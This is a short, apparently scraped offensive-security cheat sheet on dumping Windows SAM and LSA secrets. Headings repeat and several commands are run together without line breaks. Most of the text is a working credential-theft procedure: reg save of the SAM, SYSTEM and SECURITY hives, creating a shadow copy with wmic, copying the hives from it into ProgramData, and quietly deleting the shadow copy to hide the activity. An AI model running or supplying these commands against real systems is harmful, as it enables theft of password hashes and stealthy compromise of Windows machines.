SAM & LSA secrets
Dump
Hidden dump
list avaible shadow copies
copy registry keys
remove shadow copy
Last updated
list avaible shadow copies
copy registry keys
remove shadow copy
Last updated
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.savewmic shadowcopy call create Volume='C:\'vssadmin.exe list shadowscopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\ProgramData\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\ProgramData\SECURITY
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ProgramData\SYSTEMvssadmin.exe delete shadows /shadow={UUID} /quiet